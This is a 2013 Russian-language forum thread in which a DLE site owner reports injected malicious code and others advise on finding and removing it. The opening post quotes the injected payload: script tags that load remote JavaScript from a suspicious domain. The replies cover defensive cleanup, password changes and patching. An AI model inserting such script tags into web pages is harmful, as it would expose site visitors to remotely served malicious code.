Войти

Войти | Регистрация
Поиск по сайту
Посторонний скрипт в DLE
Поиск  Правила 
Seo форум » Разработка сайтов » Взлом и защита
Страницы: 1
Посторонний скрипт в DLE
#1
9 Сентября 2013 19:26
Здравствуйте!
Вот увидел в Яндекс Вебмастере что на сайте обнаружен вредоносный код, так вот зашёл на свой сайт и действительно он там оказался.

Код
<script async="async" type="text/javascript" src="http://bhq6bimdfwwo857xdurp.ru/b93a29e4fa41e0c27d1d89fc94ec24b6.js?in">
</script><script async="async" type="text/javascript" src="http://bhq6bimdfwwo857xdurp.ru/896c62ef496dc5a210eb846c4ef4c5d8.js?in"></script>


Где можно его поискать? Вылазит он в краткой новости и в полной новости, после текста. Изменения явно в файлах движка, но вот отыскать его не удалось. Может кто посоветует... Заранее благодарен!
p.s. в файлах конфиг.пхп и бдконфиг.пхп посмотрел.
#2
9 Сентября 2013 19:34
ищите по фтп или как удобно (через хостера) файлы с недавней датой изменения.
также помогает поиск строки кода, в частности http://bhq6bim
часто делают инекцию в каталоги \engine\modules или \ engine\inc 
Биржа криптовалюты

Отличный хостинг Webhost1
#3
9 Сентября 2013 19:37
А всё нашёл. Засрали всю БД. Кто знает если я просто всё почищу это не повториться заново?
#4
9 Сентября 2013 19:47
очень может, надо искать дырку и латать
#5
10 Сентября 2013 00:16
Цитата
killer1000 пишет:
А всё нашёл. Засрали всю БД. Кто знает если я просто всё почищу это не повториться заново?
Где нашел? У меня такая же гадость появилась. Ничего не нахожу ни в файлах движка, ни в базе..
#6
10 Сентября 2013 01:41
сперва пароль от фтп смените... а потом разбирайтесь со скриптами
#7
10 Сентября 2013 01:42
проблема явно в .js
#8
10 Сентября 2013 05:40
Это шеллы, их вливают через уязвимости в ДЛЕ. Советую обратиться к автору этого топика: www.cy-pr.com/forum/f80/t55113/
#9
10 Сентября 2013 09:37
Если код в статье, то это в БД. При наличии свежей версии достаточно сделать перестроение публикаций в админке и из новостей код удалится. так же надо проверить файлы, в которых может быть вредоносный код:
index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php
Обязательно сменить все пароли (к БД, фтп, админка) и установить патчи безопасность в зависимости от версии скрипта, с оффсайта. Если стоит нулл, менять на "чистую" версию скрипта.
#10
30 Октября 2013 18:01
Цитата
ориться зан
#11
30 Октября 2013 18:02
>p.s. в файлах конфиг.пхп и бдконфиг.пхп посмотрел.Причем тут эти файлы? Если получили доступ к бд значит дырка на хостинге, а туда могли попасть через взлом фтп. 
#12
30 Октября 2013 18:47
Закрыть дырки надо, на оф. сайте заплатки лежат, была такая же херня, доступ был получен из кеша базы, что-то в этом роде.
 
Страницы: 1
Похожие темы:
  24.03.2021 21:29  Скрипт защиты от копирования. Помогите немного доработать
  17.06.2019 20:39  Бот для поиска вирусов и вредоносных скриптов CwisAntivirusBot
  16.10.2017 12:40  Мобильный редирект на посторонний ресурс
  18.03.2017 04:56  Появляется вредоносный скрипт на сайте =(
  03.12.2016 11:30  Непонятный скрипт в каждой записи
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
15:54 Заказал "положить сайт" а положили тебя? Полиция добралась до клиентов DDoS-сервисов 
15:36 Скан глаза для Zoom и Tinder + ап Яндекса 21 апреля. К этому реально всё идёт? 
15:31 Штрафы за крипту до 2 млн + ап Яндекса 19 апреля - что опять поменяли и куда всё катится? 
15:02 Claude по паспорту + апдейт Яндекса 17 апреля - у кого что по выдаче 
14:46 В Яндексе позиции держатся, а трафик проседает - стало заметно сильнее 
17:05 ИКС Яндекс АПдейт 1 апреля 2026. Обновлён алгоритм расчёта 
16:58 Ап выдачи Яндекса 8 апреля - есть движение, но интереснее что творится с AI-ответами Google 
14:52 Прошу оценить сайт 
13:56 Owlchange.com — сервис обмена криптовалют с выплатами в фиат 
13:39 Вериф аккаунты АВИТО + платежи 
10:26 Мониторинг обменников Сrypto-scout.io 
09:13 Monitex: Мониторинг с кэшбэком 80% в USDT 
05:09 От $0.015 за IP | $0.68 за ГБ | 9PROXY.COM | 20+ млн резидентных прокси | 99,95% аптайм | Без чёрных списков 
23:49 GoodsMoney.io 
14:49 Список обновленных тем пуст... 
11:21 ЕС сделал проверку возраста, а её уже ломают за минуты. Серьёзно? 
19:57 Во Франции начали штрафовать за IPTV - до 300-400 евро уже прилетает обычным пользователям 
17:02 арбитражники 
12:26 Заработок на загрузочном сайте в 2026? 
09:49 Точные прогнозы на футбол 
02:22 Ставки на супер тренды в спорте 
Апдейты
  • Яндекс ИКС Яндекс выдача 02.04.2026 (19 дней назад)
  • Яндекс выдача Яндекс выдачаМониторинг апдейтов 21.04.2026 (сегодня)

     Доска объявлений
     Купить / Продать
     Работа / Услуги
Интересные темы
—  Развитие канала в Яндекс Дзен
—  Ютуб - продвижение и заработок
—  Путь из слесаря в копирайтеры со своей командой
—  Нейросети против Антиплагиата: студент доказал, что можно пройти проверку на уникальность
—  Монетизация любого типа контента на YouTube. Adsense больше не нужен!


Показать все

Интернет новости

Как понравиться Google?26.03
Как понравиться Google?

25.03 Telegram заблокировали в Испании

25.03 Власти РФ требуют от Telegram бороться с "не такими" новостями

23.03 Microsoft покупает рекламу в выдаче Google для раскрутки Bing

22.03 Google Gemini открыта для тестирования

21.03 Yahoo! продолжает "угрожать" своим новым поиском


Инструменты
Все инструменты

© Сервис анализа сайтов CY-PR.com 2008-2050